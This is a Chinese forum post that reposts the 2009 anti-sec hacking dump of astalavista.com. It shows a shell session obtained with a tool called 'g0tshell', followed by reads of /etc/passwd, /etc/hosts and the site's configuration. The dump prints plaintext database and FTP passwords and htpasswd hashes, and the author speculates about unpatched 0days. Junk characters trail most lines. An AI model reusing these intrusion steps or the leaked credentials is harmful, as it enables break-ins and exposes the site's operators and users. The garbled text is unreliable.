里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。' x7 x6 W7 Y( P' H' |# ` u* i: w
4 j: A g+ C! D% y( n4 ?
[root@front3 ~]# curl -I litespeedtech.com/ Y. ~: p' y" k6 `
HTTP/1.1 200 OK% b# G) L' T6 q" N
Date: Fri, 05 Jun 2009 22:54:51 GMT$ k( v( m" u- g8 K
Server: LiteSpeed' P: z8 F, U) s( w
/ l' Z+ c% J7 s6 ?4 A5 U另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-5 w, \- a; M& m9 R# q
3 n3 q, O& o Y& j有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
. p# Y" ~& `9 V5 O3 l& `/ j% {4 s3 r1 }5 F1 v4 c5 [
+ g |# ]% @1 `/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ 2 k% m0 B( H+ m3 l* o" Y+ @
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \, m# z7 F% G- H
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \1 Y1 {8 n: b5 j, ]* r; W$ X- s
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
8 @0 L- M2 i" f, @ \/ \/ \/ \/ \/ \/ \/" {4 T9 r7 P# F) ]
The Hacking & Security Community
+ d1 _3 A5 F" s[+] Founded in 1997 by a hacker computer enthusiast5 |% S- R% l% [* `
[-] Exposed in 2009 by anti-sec group2 O0 v% l' y1 F) o5 f' |; c
) O. o$ P, f% `6 `7 Y5 O
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:' j6 ~3 l3 d2 Z H: M3 K2 `
>> 03. Who’s behind the site?
2 J- `, m7 n$ b. T3 D5 g7 ?>>
/ k4 D* x2 r; }! w" @1 x$ i>> A team of security and IT professionals, and a countless number of contributors from all over the world." {6 T6 ~& O1 K- X% b/ s ]: }
7 V# J. v+ |) T/ r# w w% \>> 05. Is it true that the site is visited by script-kiddies and warez fans only?6 E! g/ p+ ]4 o! ]) T
>>* t5 `& m7 M. L9 r* ]5 @' l
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and7 O0 O) U4 i i/ k, q' u
military institutions.. o. |- `+ Z" `/ H8 ? ]
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.9 P* E% K; m* i$ H' X8 u
& b+ u1 W" B0 _* q2 x+ u
Why has Astalavista been targeted?5 U& H8 }+ R0 c3 x# M
2 E# S6 `; i7 n" I
Other than the fact that they are not doing any of this for the “community” but; y' ?, K7 S, ]( k% t' q' z0 Z
for the money, they spread exploits for kids, claim to be a security community
# Y L2 U2 t8 y" i(with no real sense of security on their own servers), and they charge you $6.66% I) x6 @; x: R9 B/ x+ Y, |2 |
per months to access a dead forum with a directory filled with public releases
" q' J* e! J" o( G' w8 \; Band outdated / broken services.( _1 F' @/ Z; Y, Z W
6 G1 O9 \- w+ W- U
We wanted to see how good that “team of security and IT professionals” really is.
; Z* p3 I5 U6 e4 [8 N- m! _
# M0 K: s% Y0 D/ xLet’s begin.* O) z! @- d+ B
) C/ T S, M, C4 z3 e. T3 M
anti-sec:~# ./g0tshell astalavista.com -p 80
; r: U' k! H8 y, X[+] Connecting to astalavista.com:80& P0 b' t8 \! F5 ~4 u) C8 z" Q2 o
[+] Grabbing banner…( ~5 U% R r/ q9 a
LiteSpeed
! R, W3 ^! _- D8 ?, i[+] Injecting shellcode…
4 H, t8 t5 _) z2 p8 U# w( o[-] Wait for it) d& s( ]$ J5 H
3 a8 s/ d% h( U& n. M
[~] We g0tshell
$ G1 k% P6 N3 b, W+ |uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
1 p D; ?) v' M) WID: uid=100(apache) gid=500(apache) groups=500(apache)
4 N. a8 D E( u7 q
) u6 R8 t, L) D" v Esh-3.2$ cat /etc/passwd
, U/ \+ Q/ u% K ?root:x:0:0:root:/root:/bin/bash2 H, ~1 H; ~1 i" R6 ^) u$ b; ~
bin:x:1:1:bin:/bin:/sbin/nologin
- B8 Y `) B: n( N a# I9 qdaemon:x:2:2:daemon:/sbin:/sbin/nologin% O' o" \' v. G) S
adm:x:3:4:adm:/var/adm:/sbin/nologin- | Z8 t/ |' H, l
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin( \& X9 g6 `9 b7 O. R
sync:x:5:0:sync:/sbin:/bin/sync
3 O1 O5 `7 L0 N, ^shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown" h2 I4 S" G" |# I& t, F8 N
halt:x:7:0:halt:/sbin:/sbin/halt* ?7 J; g0 s8 h2 ^) Z( W3 }
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
5 P' o& W2 x! q: M4 ]news:x:9:13:news:/etc/news:
* o3 p+ [+ N8 [% L7 Tuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin! ^3 M* q$ C! D" [9 T, D: q; l( i
operator:x:11:0 perator:/root:/sbin/nologin
' n5 ~5 Z9 H$ T) \/ G/ Dgames:x:12:100:games:/usr/games:/sbin/nologin1 N% m s" a- P# J6 c4 Z
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin: c, c$ B6 d. d( l
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
* q' Z1 O: `: w/ F' [1 c5 mnobody:x:99:99:Nobody:/:/sbin/nologin3 c T7 _5 G6 h
rpm:x:37:37::/var/lib/rpm:/sbin/nologin+ M, a. \9 B, r/ V# Z5 w8 y
dbus:x:81:81:System message bus:/:/sbin/nologin0 t$ Z0 N& d. w/ k3 Y
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
/ Y& J8 F# A1 z {; S' E+ gmailnull:x:47:47::/var/spool/mqueue:/sbin/nologin% T' t2 i# {5 B$ e4 v; P/ l1 ^) ^5 W
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
# h- ?+ i3 g p# |1 ~4 Dvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
/ ~% k$ D# ~- t7 o2 E [* o9 ~haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
) Q# j4 ^, f o( {2 j, _8 Urpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
& P' u# O! P3 T! c j6 D3 C% jrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
! j+ y( v( ]" c- q" Anfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
' F2 O+ b5 v: q4 W, t0 e5 Msshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
7 y, b( m) L3 Vpcap:x:77:77::/var/arpwatch:/sbin/nologin
5 Q) t9 m0 c( b8 f# \named:x:25:25:Named:/var/named:/sbin/nologin/ T# G" n$ j* W/ g
apache:x:100:500::/var/www:/bin/false/ f! A' [1 |$ g: R: F$ _2 L
diradmin:x:101:101::/usr/local/directadmin:/bin/bash2 z7 ?8 m) c! E, p0 u+ W
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash9 @, q9 V+ q* g( c! y" l; g
webapps:x:500:501::/var/www/html:/bin/bash$ w3 D7 w6 i- b( z$ ]
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
2 v5 q+ g1 i/ U {admin:x:501:502::/home/admin:/bin/bash
$ |4 I( j( F/ _2 ~. ?jon:x:502:503::/home/jon:/bin/bash
1 d5 ]- \1 w/ [& W, { ?com:x:503:504::/home/com:/bin/bash2 B5 K1 c( v# r8 s$ w; X
ntp:x:38:38::/etc/ntp:/sbin/nologin
, f5 G+ h0 w5 B- Gais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin7 `: l/ ^0 g7 T, L0 T6 ~
astanet:x:504:505::/home/astanet:/bin/bash
' n+ e: e$ G \avahi:x:70:70:Avahi daemon:/:/sbin/nologin' K! ?6 G8 a& E" e0 H- K" y
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin6 O- Y. S) n' ^ g, ~, {2 j
8 M) z8 d" O* C: ~) Ush-3.2$ cat /etc/hosts
: q9 d7 R6 W& Y% y& _ `' k6 |1 X# Do not remove the following line, or various programs
5 c9 S& i4 ?1 j0 l4 X- b# that require network functionality will fail.
' B+ h$ u: G$ D" c& ^5 R127.0.0.1 localhost.localdomain localhost- E1 O5 W7 H* ~$ W5 D, w0 G
::1 localhost6.localdomain6 localhost6! ~+ ^9 l5 F3 x1 z0 c+ y4 ]6 O4 X
80.74.154.172 asta1.astalavistaserver.com
' ^! H! m* W" {- G, C9 W
8 k8 n$ P8 t" vsh-3.2$ pwd1 S) o6 o: u' ]2 P5 l+ L# C5 c
/home/com/public_html
$ H# p4 M+ J9 {* l3 O: B/ b: v
- B4 b& a: n V) F Ssh-3.2$ ls -la
0 y$ T, @5 s2 N* |* v0 M6 Utotal 184608 p; P" n: o' x/ v3 X& @9 [
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
& z% r5 Z/ |6 X' Zdrwx–x–x 11 com com 4096 Jun 25 2008 ..
# G* @% p8 n( f; ^) Ldrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin- A& H' E. l v: x; W
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
9 I. z, c% v9 Y6 l3 }/ w1 m+ _drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin5 g+ h3 }0 ^, J0 R i x
drwxrwxrwx 2 com com 4096 May 19 00:50 config R4 T" w* m, u9 ~; W0 `
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
% o9 i1 i1 d/ I2 @5 R/ Cdrwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
, D" y) w! T7 M, O2 y$ t& ~drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
& L- i( X1 P. t8 Tdrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo% E$ R! t& H; {; ]
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
: G& f6 h( s1 y9 u4 v-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php9 h a; N+ Y( ~- i
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd1 P* Q6 M1 E6 g9 d0 p; s
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
3 P/ s* c( f4 W- P0 U; l0 P-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
1 i9 w6 f5 _$ |7 \0 xdrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
; f' u. E4 [7 w-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess: [1 `3 }* j ~3 S
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak; X- I# \. @9 B# X; r* s
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak; @' Z+ x6 Z, l/ q6 N; u- V
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool7 @$ d1 C! I' x) H6 `
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images7 z, {, z c. g3 @( J; x8 Q
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
, B! }9 \( R% _- U, jdrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
' x- h- v5 a5 j2 `2 G- y7 fdrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
; ]& S1 b" K) Sdrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib4 O" `/ j3 N5 X, L! {. g+ Q
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
. ]8 b; m) N/ J Cdrwxr-xr-x 8 com com 4096 May 11 12:48 modifications l9 v: G3 c' Y
drwxr-xr-x 34 com com 4096 May 28 16:30 modules8 u) s* Y' | Q: T( J7 O
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
0 |' J: R0 S1 Bdrwxrwxr-x 22 com com 4096 May 28 17:06 _new
( E- D3 [. d. s6 m* H, n% F! Ndrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old3 \4 ]- i/ e# @: |6 B' d$ B
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy# I5 e: Z6 _/ F; n
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy7 h9 ^( g' Z! F4 }9 E; z/ G
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt- B4 w" Q' W9 N, _7 d& A
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
' {! v7 f n+ t2 G3 w+ C-rw-r–r– 1 com com 223 Mar 30 15:32 test.php2 F7 i8 i; f0 P
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
- X" d& f0 U- l$ W: m0 Qdrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
# \0 P) L* a& qdrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam& ]7 z" C6 }( V/ Q
, Y/ F' P, q4 w. H# Q7 x1 o: q* tsh-3.2$ head -20 index.php
1 g8 H: F* W' j9 h2 \<?php/ B# p6 X' A& ]* R
/ F( y/ J2 Y" U% H' ]8 E, v8 l/**1 Z6 J/ @$ `2 ~* |6 W Y* {
* The main page for the CMS
9 Q; {7 E, @" D/ X+ r* @copyright CONTREXX CMS - COMVATION AG
1 N9 t+ t0 _# s8 E* @author Comvation Development Team
- K2 a @* V! `; |+ }! B* @version v1.0.9.10.1 stable
5 S: s. [- `+ J- W, ]' q ?* @package contrexx
* w% B" ^5 Y9 [! A* @subpackage core# s* [3 ?4 ~% a t) ^
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
3 F" d' f2 k* `5 D* @9 i6 ]* @since v0.0.0.0, I3 j5 c( h4 s1 P3 c
* @todo Capitalize all class names in project3 ^' W6 `) j" ^/ ?4 p" q" f" r
* @uses /config/configuration.php
_& ?, Q; j v" ^2 L' J* @uses /config/settings.php& _2 u- Z! { {* K" k
* @uses /config/version.php
2 N' R* }6 N( T x' v! i2 Y* @uses /core/API.php! Z5 w" A4 t* [6 S# q
* @uses /core_modules/cache/index.class.php
: b1 S6 i, U1 j6 U) Q( h2 `* @uses /core/error.class.php
* c6 A* y# ~: l' ^+ V* @uses /core_modules/banner/index.class.php. \! z5 k" X( U& K+ a
* @uses /core_modules/contact/index.class.php( C# G4 q3 z4 i7 j9 ]3 C" ]8 ~
/ k0 P5 r; C6 J4 o; `
sh-3.2$ cd config/
) i3 n2 \2 U* ]3 z4 d9 gsh-3.2$ ls -la! C' d) H& o" e- i) Z$ V
total 32" g- A. S. d% q- J& j) ^5 y/ N9 ~
drwxrwxrwx 2 com com 4096 May 19 00:50 .
& d5 N* i) X/ M9 Q* M0 ^' ^drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
5 R9 L( y& e1 F- L, p7 g-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
$ Y$ o J. N6 V" h7 M5 ^- U( f-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
$ J2 n9 x6 q/ x$ L* L-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php5 b* j8 `/ B: _3 i5 q8 b o" Y( l
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php7 s, P L9 R) V: z9 _- k
' b8 {( e4 }4 Gsh-3.2$ cat configuration.php% Z& x. b4 E% ]
[snip]5 e3 j- I: t9 F( b# h& g
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
3 f- Q }& @, i$ Y2 G$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
4 q5 b" k. _" `0 u$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
4 o! y1 U& ~% _1 _- U$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
) E S, M! _! K$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
6 o4 n9 J7 ]2 H/ i$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
U9 F6 z* T% R& Y0 r' x5 H$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)- o) L& t" k- K7 x
[snip]
+ H* a2 u, g! w* t# a$_FTPCONFIG['is_activated'] = true; // Ftp support true or false8 t$ P" n5 U1 x- p* l& I$ b
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
( _2 N E1 c* L% ^; q$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost8 `0 X8 w8 c1 e. \
$_FTPCONFIG['port'] = 21; // Ftp remote port
K6 ?4 E, ^! Z$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username4 K. g3 s- M! L! \/ x" x* C
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
* `, v" a |; s* h! [6 h8 t$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
9 |9 V! ~# L I7 ?+ m% W3 b+ t
7 U$ N: N. h' y6 Ssh-3.2$ cd ..
. a* H! M3 X- Z# x/ w+ |1 ^sh-3.2$ cd dvd// z! D; J3 @5 a6 ], v* `/ i9 y
sh-3.2$ ls -la
; B; ^$ _. r* e" C" S: H) ttotal 2913780 u" I ~4 H7 M
drwxr-xr-x 2 com com 4096 Sep 9 2008 .9 Z {6 G3 o3 Z' K; B1 ]8 S ?8 f
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..4 p* p+ q$ X3 Y( v
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar- D: v# ~. u6 ?. U: S8 f
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
: h/ z- U2 X7 K; _5 ]% ?-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar9 M$ f1 o+ o) C4 K8 s
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess3 S' t: r* l- w- X9 U- [3 G
9 E, x& J" P7 ?9 ^9 r
sh-3.2$ cat .htaccess# i$ S$ y# X8 J
authType Basic
- ^$ i$ B1 `' h3 g7 S4 d4 B, ~' UauthName DVD6 I4 S* X& t7 U0 I
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd: S/ I4 g7 w, U( c; E: I
require valid-user1 ~& Z/ j% Z- r' `2 w! x
' I" s: A' u7 Q/ L6 u& E
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd$ M7 Z$ o6 p* k u. A9 Y
DVDdownload:CRD8cuY6.MPT66 G( U" L8 Y3 g
DVDdownload2:CR8a36.wluFMg
4 f0 t& i' Z! _3 I: x) m) K- o8 ~9 _ y
sh-3.2$ cat test.php
$ f, q0 Z1 X3 d<?php7 z$ W6 }- G7 Y: v! j
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
$ r! @0 S! g7 C8 R7 T7 `$ x$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
+ E3 J3 ]& @0 ~0 C! ?* l3 iecho $url;
( l. F2 K' \+ y4 q3 O3 d* i?>- x7 a& h! o2 m+ q6 R
' P( Q) {% {' F) `! @sh-3.2$ cd modifications/
7 I: O5 y. B Ysh-3.2$ ls -la
# y6 _# p9 D' p* f4 Qtotal 32' L$ u4 s0 z# r5 U5 C! t
drwxr-xr-x 8 com com 4096 May 11 12:48 . \' c g; M) I$ f
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
" K! P0 X# k3 mdrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng* p ~ x- G2 b& H$ V1 X
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
& o' B# T" P! V+ `drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
( D8 @5 W# z/ u# o4 X& edrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc4 ?2 F' w) L: y& j
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
- j' b; h" L$ ?drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
, a' E# v: i3 \1 H
; i# A' ~7 m$ e$ ~1 e4 [sh-3.2$ ls -R# S$ W) B, J- t0 h) k8 u
.:
% E+ ^! R5 K, Q; @* m( Wcom_avtng cronjobs onlinetools pjirc search _tmp k; \! x0 J3 B" t' u" p, _6 w* g1 A
$ e" M' A$ w/ e2 W0 o X6 _./com_avtng:
4 K& Q+ M9 B; Uavtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts7 g" H$ ^. K' S& H3 ~$ u: K, K
3 X8 {6 u4 u9 W+ K
./com_avtng/scripts:, e' i: j& t: ~% D5 k9 M) c" \3 v
popunder.js: f3 R$ D# ^# J2 W3 i# N
# g6 G. B8 b& p
./cronjobs:
1 i, s+ x- Z" [1 L% @8 m$ vexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
/ o- @$ H4 p8 O
2 B& ^9 a3 v0 h& [) K./cronjobs/tmp:3 v8 j; [# |: K; T- ^& P
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
3 [0 L$ B0 P$ \2 f. {' V
9 l, M3 n, j2 \( R./onlinetools:
5 |0 e1 m* H/ @8 c4 h( Vindex.php
* @4 k, {' S4 C) O0 H
2 `; q; y% E( k' p, S: k" o./pjirc:, k. n; Z; G6 I, z9 @% p: H
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt/ H5 f* o/ ~/ d. e9 N
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt+ `! Y0 r9 e' ?' ]) M
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd$ T( P5 D1 U0 r! V8 i
- J0 `& f, [( I+ A4 |
./pjirc/img:" N9 l( w" k* D4 @! s' w" j7 E
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
) X4 @: \6 q; Iarbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif % G7 \$ j: W4 ~
verre-eau.gif
6 N+ I, Z! _$ N3 d- zargh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
/ [/ \# ^4 [9 _- E1 c- W4 }* @verre-vin.gif
5 N. t- N: E) zballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
) D; _( H' {3 A! Abiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
2 O9 F# z, D- Z6 e/ F
2 R$ j) w9 h* I1 F8 _./pjirc/snd:
0 a) o' z* e1 s$ O2 n( Obell2.au ding.au7 c5 X E2 v9 r& I
5 n3 b5 L+ B& c! C7 d, S9 x4 o./search:8 ?: H7 E3 r. H# Y( `
searchEngines.php search.php
3 F& C( D: U8 }8 L; ?% G& O* \8 A
./_tmp:
1 X) e. q8 H1 O: NdefaultPorts.php defaultPorts.txt
; [+ I! b+ Z& L7 c7 m$ h4 J" Z3 }
0 s7 I4 w k5 N7 F* Ssh-3.2$ cd cronjobs/; Y7 }, m# Z. L5 O* k" N$ W
sh-3.2$ cat exploits.php4 L" s( p' D7 G
[snip]
) R1 `& Z& f0 e% B A/ F4 o$categories = array();9 _; ~' i! k5 X, I6 K
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;5 Y; L8 s3 Z; Z; w( W( p
$expolits = file($milw0rmFile);# p% _% a+ _3 q" n
$comExploits = array();
. v( T6 J# a8 h: O[snip]
: L, @+ N" |' y5 t# K* H0 p// manage data
3 m* K2 Z3 N+ _" X8 ?* J& V8 @1 ~for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640+ g, ` b# x7 O8 T
# ~1 q) p8 n1 w' c5 i: Q // get path and title
0 k) B8 h8 S* \5 H) M$ K $expolits[$x] = trim($expolits[$x]);9 D' u$ i6 g- \$ K1 g+ \/ O5 f
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));" d% F: ?1 Q+ d
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
* ^- O6 j! w2 O3 K
: X- ^4 ^6 N" ]$ [( P // check if file exists
: T# U0 K% G/ Z if (file_exists($path)) {
}. r9 T* P( Z% e! n
; g" Z* ]# f( M. a, `! s $text = file_get_contents($path);, Q/ Q0 [& A: l: v4 g) K1 x. l
6 I/ L% `8 \, A+ s& L // get content and date( ^2 {- X1 s1 B5 I$ i- D: ~" }
//$text = htmlspecialchars($text, ENT_QUOTES);
7 g* N. B- Q7 r* r3 f' T8 F# J $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));% ?3 N* u9 ~4 ?3 a5 @# _
if ($tmptext != ”) {
' \. t; K: z, f9 w $text = $tmptext;
^7 A' S. Q! s& j. T } else {6 O6 m! v, F" d' u' ?1 X* }' R; v
$text = addslashes(htmlentities($text, ENT_QUOTES));8 x- I0 N2 V' h
}
3 w, A( b7 \4 w; a, i. N $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));& c+ q' j3 @; Q7 @
$tmp = explode('-', $date);
0 U& w% \+ k' X/ n $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
- F3 l/ @9 a) J9 p9 S4 k: h2 ` $cat = getCategory ($path);
7 r8 w$ e6 `, ^1 g- B! u' m6 g1 ?* S $ext = pathinfo(basename($path));2 o: m z& v' `0 x
$ext = $ext['extension'];% D9 _; A$ k3 Y P# i$ Y9 ^" z
$qStr = ”' o, x7 F, Y" j' v) U5 T
SELECT `id`, ^- j$ X; v, M; m3 H; }/ Q
FROM `contrexx_module_exploits`
" n! C* U2 A1 E9 B WHERE `title` = ‘” . $title . “‘, y: t+ I, ~: j0 a' T" n
AND `date` = ‘” . $date . “‘
4 L9 k: H% B! [5 V “;0 d, W# ^3 Q2 r& G$ m
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;! \5 V% Y, k8 m3 r8 A, g/ k' H. M5 T
$q = $_objDB->query($qStr);8 w' B5 A" A) {. i5 c
V0 e; @5 \+ o if ($q->numRows() == 0) {
. _4 L$ _. _$ U, h$ q: u
" F2 F- g# W( ~0 q% {( r6 T // prepare array/ H& D! y/ ^) Q2 O& K7 n9 \- ~2 l
$comExploits[$x]['date'] = $date;" J8 n; O* E1 n. Q" S4 G
$comExploits[$x]['title'] = $title; ~6 Q2 i, F1 Q* F0 C( @/ x5 f8 S) B- a
$comExploits[$x]['author'] = ‘milw0rm’;
+ T: I" w/ N' N $comExploits[$x]['text'] = $text;% ]+ V! c) ], ]
$comExploits[$x]['source'] = $ext;" n, V2 q* R6 P# c# p
$comExploits[$x]['url1'] = ”;& p5 u1 h/ b5 q% M" G
$comExploits[$x]['url2'] = ”;
8 X2 M0 }2 B; D5 D2 |0 s& Y& f $comExploits[$x]['catid'] = $cat;
4 H" D: n$ f" c. |; w6 s8 U( o& y $comExploits[$x]['lang'] = ‘2′;
6 h+ U" s5 M; Y8 G. ~ $comExploits[$x]['userid'] = ‘12′;
. Q% F" l* G' U: `4 g2 t/ } $comExploits[$x]['startdate'] = ‘0000-00-00′;
3 U8 A. ^4 e8 c4 b, O1 f+ i$ m $comExploits[$x]['enddate'] = ‘0000-00-00′;& ?4 Y- |2 |5 }
$comExploits[$x]['status'] = ‘1′;
! v x5 `$ W6 r2 f: R $comExploits[$x]['changelog'] = $date;
! Y; y0 I( _) h. q8 {9 s! b; T0 e+ e0 I9 C6 n, k, G
}
" Q; c: l% @5 Q( K' ^+ q/ |+ `[snip]
: D; ^# p$ n& {: e1 o+ t $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
4 P; l, X" L# q# o<rss version=”2.0″>
3 v& B% C0 T, i( n4 } <channel>
! C0 d/ D/ H* S <title>ASTALAVISTA.com - Exploits</title>
! z0 P8 h4 x. z <link>http://www.astalavista.com/exploits</link>
' N$ e! _, c& Q- x7 n2 M3 V5 d& X <description>All availably Exploits.</description>0 N; z) A/ m8 j. V
<language>en-us</language>: D$ Q* b, l& x, q& R; a& |! h
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
